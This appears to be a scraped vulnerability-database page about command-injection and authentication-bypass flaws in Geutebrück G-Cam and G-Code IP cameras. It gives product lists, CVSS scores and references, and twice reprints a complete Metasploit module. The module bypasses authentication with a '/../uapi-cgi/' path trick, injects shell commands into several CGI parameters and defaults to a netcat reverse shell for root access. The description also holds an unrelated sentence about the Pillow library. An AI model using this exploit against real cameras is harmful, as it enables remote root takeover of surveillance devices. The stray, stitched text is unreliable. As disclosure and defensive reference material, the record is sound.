response that we could retrieve the version from!\u0027)\n end\n\n rex_version = Rex::Version.new(version)\n vprint_status(\"Found Geutebruck version #{rex_version}\")\n if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n method = target[\u0027http_method\u0027]\n if method == \u0027GET\u0027\n http_method_vars = \u0027vars_get\u0027\n else\n http_method_vars = \u0027vars_post\u0027\n end\n\n http_vars = target[\u0027http_vars\u0027]\n http_vars.each do |(k, v)|\n if v.include? \u0027PLACEHOLDER_CMD\u0027\n http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n end\n end\n\n print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n send_request_cgi(\n {\n \u0027method\u0027 =\u003e method,\n \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n http_method_vars =\u003e http_vars\n }\n )\n print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33544"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33544"
},
{
"db": "PACKETSTORM",
"id": "164036"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33544",
"trust": 2.7
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164036",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "CXSECURITY",
"id": "WLB-2021090031",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33544",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33544"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"id": "VAR-202109-0597",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T21:21:41.117000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Geutebr\u00fcck G-Cam E2 and G-Code Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158073"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 1.6,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.7,
"url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2021090031"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
},
{
"trust": 0.1,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "http://geutebruck.com\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33544"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33544"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-09-02T15:36:40",
"db": "PACKETSTORM",
"id": "164036"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2093"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-09-13T18:15:21.130000",
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2022-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2093"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2023-11-07T03:35:51.497000",
"db": "NVD",
"id": "CVE-2021-33544"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2093"
}
],
"trust": 0.6
}
}
VAR-202109-0860
Vulnerability from variot - Updated: 2025-01-30 21:08Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },
'Author' => [
'Titouan Lazard', # Of RandoriSec - Discovery
'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33543'],
['CVE', '2021-33544'],
['CVE', '2021-33548'],
['CVE', '2021-33550'],
['CVE', '2021-33551'],
['CVE', '2021-33552'],
['CVE', '2021-33553'],
['CVE', '2021-33554'],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
[ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'CVE-2021-33544 - certmngr.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'createselfcert',
'local' => Rex::Text.rand_text_alphanumeric(10..16),
'country' => Rex::Text.rand_text_alphanumeric(2),
'state' => '$(PLACEHOLDER_CMD)',
'organization' => Rex::Text.rand_text_alphanumeric(10..16),
'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
'days' => Rex::Text.rand_text_numeric(2..4),
'type' => Rex::Text.rand_text_numeric(2..4)
},
'uri' => '/../uapi-cgi/certmngr.cgi'
}
],
[
'CVE-2021-33548 - factory.cgi', {
'http_method' => 'GET',
'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/factory.cgi'
}
],
[
'CVE-2021-33550 - language.cgi', {
'http_method' => 'GET',
'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/language.cgi'
}
],
[
'CVE-2021-33551 - oem.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'set',
'enable' => 'yes',
'environment.lang' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/oem.cgi'
}
],
[
'CVE-2021-33552 - simple_reclistjs.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'get',
'timekey' => Rex::Text.rand_text_numeric(2..4),
'date' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
}
],
[
'CVE-2021-33553 - testcmd.cgi', {
'http_method' => 'GET',
'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
'uri' => '/../uapi-cgi/testcmd.cgi'
}
],
[
'CVE-2021-33554 - tmpapp.cgi', {
'http_method' => 'GET',
'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/tmpapp.cgi'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)
end
def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end
unless res&.body && !res.body.empty?
print_error('Empty body in the response!')
return false
end
res_xml = res.get_xml_document
if res_xml.at('//firmware').nil?
print_error('Target did not respond with a XML document containing the "firmware" element!')
return false
end
raw_text = res_xml.at('//firmware').text
if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
else
print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
false
end
end
def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end
rex_version = Rex::Version.new(version)
vprint_status("Found Geutebruck version #{rex_version}")
if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit print_status("#{rhost}:#{rport} - Setting up request...")
method = target['http_method']
if method == 'GET'
http_method_vars = 'vars_get'
else
http_method_vars = 'vars_post'
end
http_vars = target['http_vars']
http_vars.each do |(k, v)|
if v.include? 'PLACEHOLDER_CMD'
http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
end
end
print_status("Sending CMD injection request to #{rhost}:#{rport}")
send_request_cgi(
{
'method' => method,
'uri' => target['uri'],
http_method_vars => http_vars
}
)
print_status('Exploit complete, you should get a shell as the root user!')
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0860",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33551"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2086"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33551",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33551",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-33551",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
